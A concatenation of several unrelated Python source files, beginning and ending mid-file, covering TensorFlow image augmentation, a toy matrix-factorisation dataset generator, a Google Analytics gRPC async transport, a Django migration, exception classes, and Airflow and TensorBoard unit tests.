    images = tf.image.random_saturation(images, lower=0.5, upper=1.5)
    images = tf.image.random_hue(images, max_delta=0.2)
    images = tf.image.random_contrast(images, lower=0.5, upper=1.5)
  return images


def cifar_image_augmentation(images):
  """Image augmentation suitable for CIFAR-10/100.

  As described in https://arxiv.org/pdf/1608.06993v3.pdf (page 5).

  Args:
    images: a Tensor.
  Returns:
    Tensor of the same shape as images.
  """
  images = tf.image.resize_image_with_crop_or_pad(images, 40, 40)
  images = tf.random_crop(images, [32, 32, 3])
  images = tf.image.random_flip_left_right(images)
  return images


def random_shift(image, wsr=0.1, hsr=0.1):
  """Apply random horizontal and vertical shift to images.

  This is the default data-augmentation strategy used on CIFAR in Glow.

  Args:
    image: a 3-D Tensor
    wsr: Width shift range, as a float fraction of the width.
    hsr: Height shift range, as a float fraction of the width.
  Returns:
    images: images translated by the provided wsr and hsr.
  """
  height, width, _ = common_layers.shape_list(image)
  width_range, height_range = wsr*width, hsr*height
  height_translations = tf.random_uniform((1,), -height_range, height_range)
  width_translations = tf.random_uniform((1,), -width_range, width_range)
  translations = tf.concat((height_translations, width_translations), axis=0)
  return contrib.image().translate(image, translations=translations)

"""
Generate a toy dataset for the matrix factorisation case, and store it.

We use dimensions 100 by 50 for the dataset, and 10 latent factors.

As the prior for U and V we take value 1 for all entries (so exp 1).

As a result, each value in R has a value of around 20, and a variance of 100-120.

For contrast, the Sanger dataset of 705 by 140 shifted to nonnegative has mean 
31.522999753779082 and variance 243.2427345740027.

We add Gaussian noise of precision tau = 1 (prior for gamma: alpha=1,beta=1).
(Simply using the expectation of our Gamma distribution over tau)
"""

import sys, os
project_location = os.path.dirname(__file__)+"/../../../"
sys.path.append(project_location)

from BNMTF.code.models.distributions.exponential import exponential_draw
from BNMTF.code.models.distributions.normal import normal_draw
from BNMTF.code.cross_validation.mask import generate_M

import numpy, itertools, matplotlib.pyplot as plt

def generate_dataset(I,J,K,lambdaU,lambdaV,tau):
    # Generate U, V
    U = numpy.zeros((I,K))
    for i,k in itertools.product(xrange(0,I),xrange(0,K)):
        U[i,k] = exponential_draw(lambdaU[i,k])
    V = numpy.zeros((J,K))
    for j,k in itertools.product(xrange(0,J),xrange(0,K)):
        V[j,k] = exponential_draw(lambdaV[j,k])
    
    # Generate R
    true_R = numpy.dot(U,V.T)
    R = add_noise(true_R,tau)    
    
    return (U,V,tau,true_R,R)
    
def add_noise(true_R,tau):
    if numpy.isinf(tau):
        return numpy.copy(true_R)
    
    (I,J) = true_R.shape
    R = numpy.zeros((I,J))
    for i,j in itertools.product(xrange(0,I),xrange(0,J)):
        R[i,j] = normal_draw(true_R[i,j],tau)
    return R
    
def try_generate_M(I,J,fraction_unknown,attempts):
    for attempt in range(1,attempts+1):
        try:
            M = generate_M(I,J,fraction_unknown)
            sums_columns = M.sum(axis=0)
            sums_rows = M.sum(axis=1)
            for i,c in enumerate(sums_rows):
                assert c != 0, "Fully unobserved row in M, row %s. Fraction %s." % (i,fraction_unknown)
            for j,c in enumerate(sums_columns):
                assert c != 0, "Fully unobserved column in M, column %s. Fraction %s." % (j,fraction_unknown)
            print "Took %s attempts to generate M." % attempt
            return M
        except AssertionError:
            pass
    raise Exception("Tried to generate M %s times, with I=%s, J=%s, fraction=%s, but failed." % (attempts,I,J,fraction_unknown))
      
##########

if __name__ == "__main__":
    output_folder = project_location+"BNMTF/data_toy/bnmf/"

    I,J,K = 100, 80, 10 #20, 10, 5 #
    fraction_unknown = 0.1
    alpha, beta = 1., 1.
    lambdaU = numpy.ones((I,K))
    lambdaV = numpy.ones((I,K))
    tau = alpha / beta
    
    (U,V,tau,true_R,R) = generate_dataset(I,J,K,lambdaU,lambdaV,tau)
    
    # Try to generate M
    M = try_generate_M(I,J,fraction_unknown,attempts=1000)
    
    # Store all matrices in text files
    numpy.savetxt(open(output_folder+"U.txt",'w'),U)
    numpy.savetxt(open(output_folder+"V.txt",'w'),V)
    numpy.savetxt(open(output_folder+"R_true.txt",'w'),true_R)
    numpy.savetxt(open(output_folder+"R.txt",'w'),R)
    numpy.savetxt(open(output_folder+"M.txt",'w'),M)
    
    print "Mean R: %s. Variance R: %s. Min R: %s. Max R: %s." % (numpy.mean(R),numpy.var(R),R.min(),R.max())
    fig = plt.figure()
    plt.hist(R.flatten(),bins=range(0,int(R.max())+1))
    plt.show()
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
felix.test.stub_utils
~~~~~~~~~~~~

Test utilities.
"""
import logging
import random

from collections import namedtuple
CommandOutput = namedtuple('CommandOutput', ['stdout', 'stderr'])

# Logger
log = logging.getLogger(__name__)

# The current time.
test_time = 0

def set_time(value):
    global test_time
    test_time = value
    log.debug("Time now set to : %d" % test_time)

def get_time():
    return test_time

def get_mac():
    """
    Gets a random mac address.
    """
    mac = ("%02x:%02x:%02x:%02x:%02x:%02x" %
                    (random.randint(0x00, 0xff),
                     random.randint(0x00, 0xff),
                     random.randint(0x00, 0xff),
                     random.randint(0x00, 0xff),
                     random.randint(0x00, 0xff),
                     random.randint(0x00, 0xff)))
    return mac

# Exception raised when tests reach the end.
class TestOverException(Exception):
    pass

# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union

from google.api_core import gapic_v1  # type: ignore
from google.api_core import grpc_helpers_async  # type: ignore
from google.auth import credentials as ga_credentials  # type: ignore
from google.auth.transport.grpc import SslCredentials  # type: ignore
import packaging.version

import grpc  # type: ignore
from grpc.experimental import aio  # type: ignore

from google.analytics.data_v1alpha.types import analytics_data_api
from .base import AlphaAnalyticsDataTransport, DEFAULT_CLIENT_INFO
from .grpc import AlphaAnalyticsDataGrpcTransport


class AlphaAnalyticsDataGrpcAsyncIOTransport(AlphaAnalyticsDataTransport):
    """gRPC AsyncIO backend transport for AlphaAnalyticsData.

    Google Analytics reporting data service.

    This class defines the same methods as the primary client, so the
    primary client can load the underlying transport implementation
    and call it.

    It sends protocol buffers over the wire using gRPC (which is built on
    top of HTTP/2); the ``grpcio`` package must be installed.
    """

    _grpc_channel: aio.Channel
    _stubs: Dict[str, Callable] = {}

    @classmethod
    def create_channel(
        cls,
        host: str = "analyticsdata.googleapis.com",
        credentials: ga_credentials.Credentials = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        quota_project_id: Optional[str] = None,
        **kwargs,
    ) -> aio.Channel:
        """Create and return a gRPC AsyncIO channel object.
        Args:
            host (Optional[str]): The host for the channel to use.
            credentials (Optional[~.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify this application to the service. If
                none are specified, the client will attempt to ascertain
                the credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            kwargs (Optional[dict]): Keyword arguments, which are passed to the
                channel creation.
        Returns:
            aio.Channel: A gRPC AsyncIO channel object.
        """

        return grpc_helpers_async.create_channel(
            host,
            credentials=credentials,
            credentials_file=credentials_file,
            quota_project_id=quota_project_id,
            default_scopes=cls.AUTH_SCOPES,
            scopes=scopes,
            default_host=cls.DEFAULT_HOST,
            **kwargs,
        )

    def __init__(
        self,
        *,
        host: str = "analyticsdata.googleapis.com",
        credentials: ga_credentials.Credentials = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        channel: aio.Channel = None,
        api_mtls_endpoint: str = None,
        client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
        ssl_channel_credentials: grpc.ChannelCredentials = None,
        client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
        quota_project_id=None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
        always_use_jwt_access: Optional[bool] = False,
    ) -> None:
        """Instantiate the transport.

        Args:
            host (Optional[str]):
                 The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
                This argument is ignored if ``channel`` is provided.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            channel (Optional[aio.Channel]): A ``Channel`` instance through
                which to make calls.
            api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
                If provided, it overrides the ``host`` argument and tries to create
                a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
            client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
                Deprecated. A callback to provide client SSL certificate bytes and
                private key bytes, both in PEM format. It is ignored if
                ``api_mtls_endpoint`` is None.
            ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
                for the grpc channel. It is ignored if ``channel`` is provided.
            client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
                A callback to provide client certificate bytes and private key bytes,
                both in PEM format. It is used to configure a mutual TLS channel. It is
                ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
            always_use_jwt_access (Optional[bool]): Whether self signed JWT should
                be used for service account credentials.

        Raises:
            google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
              creation failed for any reason.
          google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
              and ``credentials_file`` are passed.
        """
        self._grpc_channel = None
        self._ssl_channel_credentials = ssl_channel_credentials
        self._stubs: Dict[str, Callable] = {}

        if api_mtls_endpoint:
            warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
        if client_cert_source:
            warnings.warn("client_cert_source is deprecated", DeprecationWarning)

        if channel:
            # Ignore credentials if a channel was passed.
            credentials = False
            # If a channel was explicitly provided, set it.
            self._grpc_channel = channel
            self._ssl_channel_credentials = None
        else:
            if api_mtls_endpoint:
                host = api_mtls_endpoint

                # Create SSL credentials with client_cert_source or application
                # default SSL credentials.
                if client_cert_source:
                    cert, key = client_cert_source()
                    self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                        certificate_chain=cert, private_key=key
                    )
                else:
                    self._ssl_channel_credentials = SslCredentials().ssl_credentials

            else:
                if client_cert_source_for_mtls and not ssl_channel_credentials:
                    cert, key = client_cert_source_for_mtls()
                    self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                        certificate_chain=cert, private_key=key
                    )

        # The base transport sets the host, credentials and scopes
        super().__init__(
            host=host,
            credentials=credentials,
            credentials_file=credentials_file,
            scopes=scopes,
            quota_project_id=quota_project_id,
            client_info=client_info,
            always_use_jwt_access=always_use_jwt_access,
        )

        if not self._grpc_channel:
            self._grpc_channel = type(self).create_channel(
                self._host,
                credentials=self._credentials,
                credentials_file=credentials_file,
                scopes=self._scopes,
                ssl_credentials=self._ssl_channel_credentials,
                quota_project_id=quota_project_id,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )

        # Wrap messages. This must be done after self._grpc_channel exists
        self._prep_wrapped_messages(client_info)

    @property
    def grpc_channel(self) -> aio.Channel:
        """Create the channel designed to connect to this service.

        This property caches on the instance; repeated calls return
        the same channel.
        """
        # Return the channel from cache.
        return self._grpc_channel

    @property
    def run_report(
        self,
    ) -> Callable[
        [analytics_data_api.RunReportRequest],
        Awaitable[analytics_data_api.RunReportResponse],
    ]:
        r"""Return a callable for the run report method over gRPC.

        Returns a customized report of your Google Analytics
        event data. Reports contain statistics derived from data
        collected by the Google Analytics tracking code. The
        data returned from the API is as a table with columns
        for the requested dimensions and metrics. Metrics are
        individual measurements of user activity on your
        property, such as active users or event count.
        Dimensions break down metrics across some common
        criteria, such as country or event name.

        Returns:
            Callable[[~.RunReportRequest],
                    Awaitable[~.RunReportResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "run_report" not in self._stubs:
            self._stubs["run_report"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/RunReport",
                request_serializer=analytics_data_api.RunReportRequest.serialize,
                response_deserializer=analytics_data_api.RunReportResponse.deserialize,
            )
        return self._stubs["run_report"]

    @property
    def run_pivot_report(
        self,
    ) -> Callable[
        [analytics_data_api.RunPivotReportRequest],
        Awaitable[analytics_data_api.RunPivotReportResponse],
    ]:
        r"""Return a callable for the run pivot report method over gRPC.

        Returns a customized pivot report of your Google
        Analytics event data. Pivot reports are more advanced
        and expressive formats than regular reports. In a pivot
        report, dimensions are only visible if they are included
        in a pivot. Multiple pivots can be specified to further
        dissect your data.

        Returns:
            Callable[[~.RunPivotReportRequest],
                    Awaitable[~.RunPivotReportResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "run_pivot_report" not in self._stubs:
            self._stubs["run_pivot_report"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/RunPivotReport",
                request_serializer=analytics_data_api.RunPivotReportRequest.serialize,
                response_deserializer=analytics_data_api.RunPivotReportResponse.deserialize,
            )
        return self._stubs["run_pivot_report"]

    @property
    def batch_run_reports(
        self,
    ) -> Callable[
        [analytics_data_api.BatchRunReportsRequest],
        Awaitable[analytics_data_api.BatchRunReportsResponse],
    ]:
        r"""Return a callable for the batch run reports method over gRPC.

        Returns multiple reports in a batch. All reports must
        be for the same Entity.

        Returns:
            Callable[[~.BatchRunReportsRequest],
                    Awaitable[~.BatchRunReportsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "batch_run_reports" not in self._stubs:
            self._stubs["batch_run_reports"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/BatchRunReports",
                request_serializer=analytics_data_api.BatchRunReportsRequest.serialize,
                response_deserializer=analytics_data_api.BatchRunReportsResponse.deserialize,
            )
        return self._stubs["batch_run_reports"]

    @property
    def batch_run_pivot_reports(
        self,
    ) -> Callable[
        [analytics_data_api.BatchRunPivotReportsRequest],
        Awaitable[analytics_data_api.BatchRunPivotReportsResponse],
    ]:
        r"""Return a callable for the batch run pivot reports method over gRPC.

        Returns multiple pivot reports in a batch. All
        reports must be for the same Entity.

        Returns:
            Callable[[~.BatchRunPivotReportsRequest],
                    Awaitable[~.BatchRunPivotReportsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "batch_run_pivot_reports" not in self._stubs:
            self._stubs["batch_run_pivot_reports"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/BatchRunPivotReports",
                request_serializer=analytics_data_api.BatchRunPivotReportsRequest.serialize,
                response_deserializer=analytics_data_api.BatchRunPivotReportsResponse.deserialize,
            )
        return self._stubs["batch_run_pivot_reports"]

    @property
    def get_metadata(
        self,
    ) -> Callable[
        [analytics_data_api.GetMetadataRequest], Awaitable[analytics_data_api.Metadata]
    ]:
        r"""Return a callable for the get metadata method over gRPC.

        Returns metadata for dimensions and metrics available in
        reporting methods. Used to explore the dimensions and metrics.
        In this method, a Google Analytics GA4 Property Identifier is
        specified in the request, and the metadata response includes
        Custom dimensions and metrics as well as Universal metadata.

        For example if a custom metric with parameter name
        ``levels_unlocked`` is registered to a property, the Metadata
        response will contain ``customEvent:levels_unlocked``. Universal
        metadata are dimensions and metrics applicable to any property
        such as ``country`` and ``totalUsers``.

        Returns:
            Callable[[~.GetMetadataRequest],
                    Awaitable[~.Metadata]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "get_metadata" not in self._stubs:
            self._stubs["get_metadata"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/GetMetadata",
                request_serializer=analytics_data_api.GetMetadataRequest.serialize,
                response_deserializer=analytics_data_api.Metadata.deserialize,
            )
        return self._stubs["get_metadata"]

    @property
    def run_realtime_report(
        self,
    ) -> Callable[
        [analytics_data_api.RunRealtimeReportRequest],
        Awaitable[analytics_data_api.RunRealtimeReportResponse],
    ]:
        r"""Return a callable for the run realtime report method over gRPC.

        The Google Analytics Realtime API returns a
        customized report of realtime event data for your
        property. These reports show events and usage from the
        last 30 minutes.

        Returns:
            Callable[[~.RunRealtimeReportRequest],
                    Awaitable[~.RunRealtimeReportResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "run_realtime_report" not in self._stubs:
            self._stubs["run_realtime_report"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/RunRealtimeReport",
                request_serializer=analytics_data_api.RunRealtimeReportRequest.serialize,
                response_deserializer=analytics_data_api.RunRealtimeReportResponse.deserialize,
            )
        return self._stubs["run_realtime_report"]


__all__ = ("AlphaAnalyticsDataGrpcAsyncIOTransport",)

# Generated by Django 2.1.7 on 2019-04-30 13:20

from django.db import migrations, models
import uuid


class Migration(migrations.Migration):

    dependencies = [
        ('core', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='publishablemodel',
            name='id',
            field=models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False),
        ),
    ]

#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from solum.api.controllers import common_types
from solum.api.controllers.v1.datamodel import types as api_types

#from solum.openstack.common import log as logging


#LOG = logging.getLogger(__name__)


class Extensions(api_types.Base):
    """extensions resource"""

    extension_links = [common_types.Link]
    """This attribute contains Links to extension resources that contain
     information about the extensions supported by this Platform."""

    def __init__(self, **kwds):
#        LOG.debug("extensions constructor: %s" % kwds)
        super(Extensions, self).__init__(**kwds)

"""Custom Exception Classes for Phylotyper Module

"""

class PhylotyperError(Exception):
    """Basic exception for errors raised by Phylotyper modules"""
    def __init__(self, subtype, msg=None):
        if msg is None:
            msg = "An error occured for subtype {}".format(subtype)
        super(PhylotyperError, self).__init__(msg)
        self.subtype = subtype


class ValuesError(PhylotyperError):
    """Unknown subtype"""
    def __init__(self, subtype, msg=None):
        super(PhylotyperError, self).__init__(
            subtype, msg="Unrecognized subtype {}".format(subtype))
 
 
class DatabaseError(PhylotyperError):
    """Missing data in Database"""
    def __init__(self, subtype, data, msg=None):
        m = "Database is missing data {} for {}".format(data, subtype)
        super(PhylotyperError, self).__init__(subtype, m)
        self.data = data
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.

import unittest

from cryptography.fernet import Fernet

from airflow import settings
from airflow.models import Variable, crypto
from tests.test_utils.config import conf_vars


class TestVariable(unittest.TestCase):
    def setUp(self):
        crypto._fernet = None

    def tearDown(self):
        crypto._fernet = None

    @conf_vars({('core', 'fernet_key'): ''})
    def test_variable_no_encryption(self):
        """
        Test variables without encryption
        """
        Variable.set('key', 'value')
        session = settings.Session()
        test_var = session.query(Variable).filter(Variable.key == 'key').one()
        self.assertFalse(test_var.is_encrypted)
        self.assertEqual(test_var.val, 'value')

    @conf_vars({('core', 'fernet_key'): Fernet.generate_key().decode()})
    def test_variable_with_encryption(self):
        """
        Test variables with encryption
        """
        Variable.set('key', 'value')
        session = settings.Session()
        test_var = session.query(Variable).filter(Variable.key == 'key').one()
        self.assertTrue(test_var.is_encrypted)
        self.assertEqual(test_var.val, 'value')

    def test_var_with_encryption_rotate_fernet_key(self):
        """
        Tests rotating encrypted variables.
        """
        key1 = Fernet.generate_key()
        key2 = Fernet.generate_key()

        with conf_vars({('core', 'fernet_key'): key1.decode()}):
            Variable.set('key', 'value')
            session = settings.Session()
            test_var = session.query(Variable).filter(Variable.key == 'key').one()
            self.assertTrue(test_var.is_encrypted)
            self.assertEqual(test_var.val, 'value')
            self.assertEqual(Fernet(key1).decrypt(test_var._val.encode()), b'value')

        # Test decrypt of old value with new key
        with conf_vars({('core', 'fernet_key'): ','.join([key2.decode(), key1.decode()])}):
            crypto._fernet = None
            self.assertEqual(test_var.val, 'value')

            # Test decrypt of new value with new key
            test_var.rotate_fernet_key()
            self.assertTrue(test_var.is_encrypted)
            self.assertEqual(test_var.val, 'value')
            self.assertEqual(Fernet(key2).decrypt(test_var._val.encode()), b'value')

# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for download_data."""


from unittest import mock

from google.protobuf import text_format
import tensorflow as tf

from tensorboard.backend.event_processing import plugin_event_multiplexer
from tensorboard.plugins import base_plugin
from tensorboard.plugins.hparams import api_pb2
from tensorboard.plugins.hparams import backend_context
from tensorboard.plugins.hparams import download_data

EXPERIMENT = """
description: 'Test experiment'
user: 'Test user'
hparam_infos: [
  {
    name: 'initial_temp'
    type: DATA_TYPE_FLOAT64
  },
  {
    name: 'final_temp'
    type: DATA_TYPE_FLOAT64
  },
  { name: 'string_hparam' },
  { name: 'bool_hparam' },
  { name: 'optional_string_hparam' }
]
metric_infos: [
  { name: { tag: 'current_temp' } },
  { name: { tag: 'delta_temp' } },
  { name: { tag: 'optional_metric' } }
]
"""

SESSION_GROUPS = """
session_groups {
  name: "group_1"
  hparams { key: "bool_hparam" value { bool_value: true } }
  hparams { key: "final_temp" value { number_value: 150.0 } }
  hparams { key: "initial_temp" value { number_value: 270.0 } }
  hparams { key: "string_hparam" value { string_value: "a string" } }
  metric_values {
    name { tag: "current_temp" }
    value: 10
    training_step: 1
    wall_time_secs: 1.0
  }
  metric_values { name { tag: "delta_temp" } value: 15
    training_step: 2
    wall_time_secs: 10.0
  }
  metric_values { name { tag: "optional_metric" } value: 33
    training_step: 20
    wall_time_secs: 2.0
  }
  sessions {
    name: "session_1"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_SUCCESS
    metric_values {
      name { tag: "current_temp" }
      value: 10
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values {
      name { tag: "delta_temp" }
      value: 15
      training_step: 2
      wall_time_secs: 10.0
    }

    metric_values {
      name { tag: "optional_metric" }
      value: 33
      training_step: 20
      wall_time_secs: 2.0
    }
  }
}
session_groups {
  name: "group_2"
  hparams { key: "bool_hparam" value { bool_value: false } }
  hparams { key: "final_temp" value { number_value: 100.0 } }
  hparams { key: "initial_temp" value { number_value: 280.0 } }
  hparams { key: "string_hparam" value { string_value: "AAAAA"}}
  metric_values {
    name { tag: "current_temp" }
    value: 51.0
    training_step: 1
    wall_time_secs: 1.0
  }
  metric_values {
    name { tag: "delta_temp" }
    value: 44.5
    training_step: 2
    wall_time_secs: 10.3333333
  }
  sessions {
    name: "session_2"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_SUCCESS
    metric_values {
      name { tag: "current_temp" }
      value: 100
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values { name { tag: "delta_temp" }
      value: 150
      training_step: 3
      wall_time_secs: 11.0
    }
  }
  sessions {
    name: "session_3"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_FAILURE
    metric_values {
      name { tag: "current_temp" }
      value: 1.0
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values { name { tag: "delta_temp" }
      value: 1.5
      training_step: 2
      wall_time_secs: 10.0
    }
  }
  sessions {
    name: "session_5"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_SUCCESS
    metric_values {
      name { tag: "current_temp" }
      value: 52.0
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values { name { tag: "delta_temp" }
      value: -18
      training_step: 2
      wall_time_secs: 10.0
    }
  }
}
session_groups {
  name: "group_3"
  hparams { key: "bool_hparam" value { bool_value: true } }
  hparams { key: "final_temp" value { number_value: 0.000012 } }
  hparams { key: "initial_temp" value { number_value: 300.0 } }
  hparams { key: "string_hparam" value { string_value: "a string_3"}}
  hparams {
    key: 'optional_string_hparam' value { string_value: 'BB' }
  }
  metric_values {
    name { tag: "current_temp" }
    value: 101.0
    training_step: 1
    wall_time_secs: 1.0
  }
  metric_values { name { tag: "delta_temp" } value: -15100000.0
    training_step: 2
    wall_time_secs: 10.0
  }
  sessions {
    name: "session_4"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_UNKNOWN
    metric_values {
      name { tag: "current_temp" }
      value: 101.0
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values { name { tag: "delta_temp" } value: -151000000.0
      training_step: 2
      wall_time_secs: 10.0
    }
  }
}
total_size: 3
"""


EXPECTED_LATEX = r"""\begin{table}[tbp]
\begin{tabular}{llllllll}
initial\_temp & final\_temp & string\_hparam & bool\_hparam & optional\_string\_hparam & current\_temp & delta\_temp & optional\_metric \\ \hline
$270$ & $150$ & a string & $1$ &  & $10$ & $15$ & $33$ \\
$280$ & $100$ & AAAAA & $0$ &  & $51$ & $44.5$ & - \\
$300$ & $1.2\cdot 10^{-5}$ & a string\_3 & $1$ & BB & $101$ & $-1.51\cdot 10^{7}$ & - \\
\hline
\end{tabular}
\end{table}
"""

EXPECTED_CSV = """initial_temp,final_temp,string_hparam,bool_hparam,optional_string_hparam,current_temp,delta_temp,optional_metric\r
270.0,150.0,a string,True,,10.0,15.0,33.0\r
280.0,100.0,AAAAA,False,,51.0,44.5,\r
300.0,1.2e-05,a string_3,True,BB,101.0,-15100000.0,\r
"""


class DownloadDataTest(tf.test.TestCase):
    def setUp(self):
        self._mock_multiplexer = mock.create_autospec(
            plugin_event_multiplexer.EventMultiplexer
        )
        self._mock_tb_context = base_plugin.TBContext(
            multiplexer=self._mock_multiplexer
        )

    def _run_handler(self, experiment, session_groups, response_format):
        experiment_proto = text_format.Merge(experiment, api_pb2.Experiment())
        session_groups_proto = text_format.Merge(
            session_groups, api_pb2.ListSessionGroupsResponse()
        )
        num_columns = len(experiment_proto.hparam_infos) + len(
            experiment_proto.metric_infos
        )
        handler = download_data.Handler(
            backend_context.Context(self._mock_tb_context),
            experiment_proto,
            session_groups_proto,
            response_format,
            [True] * num_columns,
        )
        return handler.run()

    def test_csv(self):
        body, mime_type = self._run_handler(
            EXPERIMENT, SESSION_GROUPS, download_data.OutputFormat.CSV
        )
        self.assertEqual("text/csv", mime_type)
        self.assertEqual(EXPECTED_CSV, body)

    def test_latex(self):
        body, mime_type = self._run_handler(
            EXPERIMENT, SESSION_GROUPS, download_data.OutputFormat.LATEX
        )
        self.assertEqual("application/x-latex", mime_type)
        self.assertEqual(EXPECTED_LATEX, body)

    def test_json(self):
        body, mime_type = self._run_handler(
            EXPERIMENT, SESSION_GROUPS, download_data.OutputFormat.JSON
        )
        self.assertEqual("application/json", mime_type)
        expected_result = {
            "header": [
                "initial_temp",
                "final_temp",
                "string_hparam",
                "bool_hparam",
                "optional_string_hparam",
                "current_temp",
                "delta_temp",
                "optional_metric",
            ],
            "rows": [
